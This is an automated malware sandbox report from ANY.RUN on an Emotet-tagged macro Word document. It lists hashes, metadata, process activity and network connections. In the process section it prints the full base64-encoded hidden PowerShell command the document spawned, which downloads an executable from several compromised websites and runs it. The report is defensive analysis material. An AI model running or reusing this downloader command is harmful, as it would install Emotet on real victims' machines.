analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

uozxo9-82202-738575-fbm4hisdv-0q5dy3ciz

Full analysis: https://app.any.run/tasks/4bae7fc2-3a34-4cdd-8f79-ce44d1fa9dac
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 15:19:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Veniam ipsum nihil., Author: Konrad Koehl, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 12:56:00 2019, Last Saved Time/Date: Fri Dec 6 12:56:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 337, Security: 0
MD5:

4AB4DB0A4627FD560043DC3A6CA40820

SHA1:

CB056216EC761400B1D0BBF87E25C70D174C5F82

SHA256:

1B7DBB1BBDE152268B0513E6A9C3F0485C4D2572B118527D3AA55347CB41E7B8

SSDEEP:

6144:xdv65YoA4CXD82k4utGiL3HJk+yD7b0A8ejy9:xdv65YoA4CXD8/Qitk57b/8eG9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1576)
    • PowerShell script executed

      • powershell.exe (PID: 1576)
    • Executed via WMI

      • powershell.exe (PID: 1576)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Veniam ipsum nihil.
Subject: -
Author: Konrad Koehl
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:06 12:56:00
ModifyDate: 2019:12:06 12:56:00
Pages: 1
Words: 58
Characters: 337
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 394
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\uozxo9-82202-738575-fbm4hisdv-0q5dy3ciz.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1576powershell -w hidden -en JABLAHYAcQBsAHMAdAB0AGQAZwA9ACcAVgBqAHUAZAB1AHgAbgBsAHEAYQBjAHoAZAAnADsAJABTAGIAawB5AGcAdQBlAHkAYQB5ACAAPQAgACcANQAzADUAJwA7ACQAUwBrAG4AbQBnAHYAdgBvAHkAPQAnAE4AeABuAGsAYwBlAGIAbwAnADsAJABEAGEAeQB1AGsAbwBnAHIAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBiAGsAeQBnAHUAZQB5AGEAeQArACcALgBlAHgAZQAnADsAJABRAGsAYgBuAG0AcgBlAGgAdwBuAD0AJwBOAGEAcwB0AGMAdABhAG4AZgBlAHoAJwA7ACQARgBqAGkAeQB0AGoAbAB1AGIAZQByAHcAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBFAEIAYwBsAEkARQBuAFQAOwAkAEsAdABmAGcAcwB0AGIAZQB6AGsAcwB5AGYAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgByAGoAbwAuAGMAbwBtAC8ANgBwAHEAYQBtAHkANAAvADIAYQBnAC8AKgBoAHQAdABwADoALwAvAGEAaQByAC0AbwAtAHQAcgBpAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAE4ARwAyAC8AKgBoAHQAdABwADoALwAvAGkAbgBmAC4AYQB3AHcAdABoAGkAbgBnAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG8ANgBsAC8AKgBoAHQAdABwAHMAOgAvAC8AawBhAHIAeQBhAGsAcgBlAGEAcwBpAG4AZABvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AOQB6AHQALwAqAGgAdAB0AHAAcwA6AC8ALwBnAGUAbQBzAHQAYQB0AGUAZABlAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG4AYwAvACcALgAiAHMAUABgAGwASQBUACIAKAAnACoAJwApADsAJABPAGQAcAB6AHUAYwB6AG4AdABiAHoAbQB6AD0AJwBSAGcAYwBoAGUAdwBqAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB3AG4AbQByAGUAeQBhAGwAbQBwAG0AIABpAG4AIAAkAEsAdABmAGcAcwB0AGIAZQB6AGsAcwB5AGYAKQB7AHQAcgB5AHsAJABGAGoAaQB5AHQAagBsAHUAYgBlAHIAdwAuACIARABPAGAAVwBuAEwATwBgAEEARABgAEYAaQBMAGUAIgAoACQAQwB3AG4AbQByAGUAeQBhAGwAbQBwAG0ALAAgACQARABhAHkAdQBrAG8AZwByAGcAKQA7ACQASQBvAGEAZwBsAGsAZgBuAD0AJwBPAGgAYgBsAHkAZQB1AHoAcwBnAGQAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAGEAeQB1AGsAbwBnAHIAZwApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMwA5ADkANgA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAEQAYQB5AHUAawBvAGcAcgBnACkAOwAkAFkAYwBzAHEAZABlAHEAeQBwAHMAdABsAG0APQAnAFAAZwBsAHUAcQBkAHoAYQB3AGYAcwAnADsAYgByAGUAYQBrADsAJABaAGMAeQBpAHMAZQBoAGoAcgBwAGsAPQAnAFEAcgBpAHIAbgByAGgAagBkAGEAcgBmAGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgB3AGwAawBwAGQAeQBtAHQAbABzAGgAZgA9ACcAUgBiAGEAdABtAGgAcwBlAHIAYQBoAGQAdgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 146
Read events
1 244
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA831.tmp.cvr
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A568043.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F40A3568.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACF42649.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCC807B6.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA00E83F.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CBBE534.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4F15BA5.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4DE26562.wmf
MD5:
SHA256:
2524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7631FB.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1576
powershell.exe
GET
301
209.97.150.99:80
http://www.rjo.com/6pqamy4/2ag/
US
html
162 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1576
powershell.exe
209.97.150.99:80
www.rjo.com
US
unknown
1576
powershell.exe
209.97.150.99:443
www.rjo.com
US
unknown

DNS requests

Domain
IP
Reputation
www.rjo.com
  • 209.97.150.99
unknown

Threats

No threats detected
No debug info